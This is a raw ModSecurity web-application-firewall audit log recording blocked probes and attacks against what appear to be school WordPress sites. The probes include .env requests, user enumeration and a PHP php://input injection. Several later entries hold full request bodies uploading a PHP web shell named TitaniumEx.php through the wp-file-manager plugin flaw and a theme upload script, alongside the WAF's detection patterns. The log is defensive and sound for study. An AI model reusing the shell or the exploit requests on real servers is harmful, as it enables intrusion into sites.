Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed7beb57-Z-- --d10b3605-A-- [18/May/2025:14:29:49 +0700] aCmMbfypzAd0elWOk7pI6gAAABc 103.236.140.4 49142 103.236.140.4 8181 --d10b3605-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --d10b3605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10b3605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747553389162954 886 (- - -) Stopwatch2: 1747553389162954 886; combined=339, p1=299, p2=0, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10b3605-Z-- --49947958-A-- [18/May/2025:14:46:57 +0700] aCmQcUPRqak7bVuUS6ci4gAAAIA 103.236.140.4 49270 103.236.140.4 8181 --49947958-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.106.203.75 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.106.203.75 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --49947958-C-- --49947958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49947958-E-- --49947958-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747554417031984 5159 (- - -) Stopwatch2: 1747554417031984 5159; combined=3350, p1=571, p2=2744, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49947958-Z-- --f9bf2e08-A-- [18/May/2025:15:09:35 +0700] aCmVv0PRqak7bVuUS6ckBgAAAIA 103.236.140.4 49926 103.236.140.4 8181 --f9bf2e08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9bf2e08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9bf2e08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747555775944623 2464 (- - -) Stopwatch2: 1747555775944623 2464; combined=1200, p1=384, p2=775, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9bf2e08-Z-- --3c52a926-A-- [18/May/2025:18:06:13 +0700] aCm_JUPRqak7bVuUS6dBBQAAAIQ 103.236.140.4 45138 103.236.140.4 8181 --3c52a926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c52a926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c52a926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566373609041 3611 (- - -) Stopwatch2: 1747566373609041 3611; combined=1960, p1=634, p2=1294, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c52a926-Z-- --5a0bcc76-A-- [18/May/2025:18:06:22 +0700] aCm_LlewLfDrCkDGIGyCcgAAAMQ 103.236.140.4 45318 103.236.140.4 8181 --5a0bcc76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a0bcc76-C-- demo.sayHello --5a0bcc76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a0bcc76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747566382955088 4775 (- - -) Stopwatch2: 1747566382955088 4775; combined=3752, p1=568, p2=2980, p3=33, p4=36, p5=81, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a0bcc76-Z-- --c2cb6b19-A-- [18/May/2025:18:11:33 +0700] aCnAZRir-GlPrFVVKe5rRAAAAE8 103.236.140.4 50246 103.236.140.4 8181 --c2cb6b19-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 209.38.208.202 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c2cb6b19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2cb6b19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747566693903959 884 (- - -) Stopwatch2: 1747566693903959 884; combined=358, p1=301, p2=0, p3=0, p4=0, p5=56, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2cb6b19-Z-- --83588214-A-- [18/May/2025:18:15:07 +0700] aCnBOxir-GlPrFVVKe5sgAAAAEY 103.236.140.4 54256 103.236.140.4 8181 --83588214-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --83588214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83588214-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566907176711 3303 (- - -) Stopwatch2: 1747566907176711 3303; combined=2078, p1=450, p2=1588, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83588214-Z-- --11007274-A-- [18/May/2025:18:15:07 +0700] aCnBOxir-GlPrFVVKe5sgQAAAE4 103.236.140.4 54262 103.236.140.4 8181 --11007274-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --11007274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11007274-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566907335645 3013 (- - -) Stopwatch2: 1747566907335645 3013; combined=1636, p1=414, p2=1191, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11007274-Z-- --63b14a4f-A-- [18/May/2025:18:19:36 +0700] aCnCSFewLfDrCkDGIGyHNgAAAME 103.236.140.4 60342 103.236.140.4 8181 --63b14a4f-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 143.198.94.52 Cookie: X-Varnish: 151109568 --63b14a4f-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --63b14a4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63b14a4f-E-- --63b14a4f-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567176695796 2133 (- - -) Stopwatch2: 1747567176695796 2133; combined=741, p1=434, p2=279, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63b14a4f-Z-- --74373555-A-- [18/May/2025:18:19:37 +0700] aCnCSVewLfDrCkDGIGyHTQAAAME 103.236.140.4 60398 103.236.140.4 8181 --74373555-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=a0b62c066d6dd6d31e849b94a6610f06 X-Forwarded-For: 143.198.94.52 Cookie: X-Varnish: 151109603 --74373555-C-- --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="cmd" upload --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="target" l1_Lw --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --a0b62c066d6dd6d31e849b94a6610f06-- --74373555-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74373555-E-- --74373555-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567177646948 3175 (- - -) Stopwatch2: 1747567177646948 3175; combined=2023, p1=394, p2=1599, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74373555-Z-- --2c70c955-A-- [18/May/2025:18:20:48 +0700] aCnCkPypzAd0elWOk7pnygAAAAw 103.236.140.4 33284 103.236.140.4 8181 --2c70c955-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --2c70c955-C-- =TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --2c70c955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c70c955-E-- --2c70c955-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generi Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567248540648 2007 (- - -) Stopwatch2: 1747567248540648 2007; combined=720, p1=409, p2=283, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c70c955-Z-- --c583c544-A-- [18/May/2025:18:20:50 +0700] aCnCkvypzAd0elWOk7pn2AAAAAg 103.236.140.4 33396 103.236.140.4 8181 --c583c544-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --c583c544-C-- 
Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --c583c544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c583c544-E-- --c583c544-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWA Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567250575447 1773 (- - -) Stopwatch2: 1747567250575447 1773; combined=657, p1=381, p2=247, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c583c544-Z-- --963ec72a-A-- [18/May/2025:18:20:51 +0700] aCnCk0PRqak7bVuUS6dF2AAAAIM 103.236.140.4 33446 103.236.140.4 8181 --963ec72a-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=5fbb6cf0922da7f286f5eb3f3543fa55 --963ec72a-C-- --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="cmd" upload --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="target" l1_Lw --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
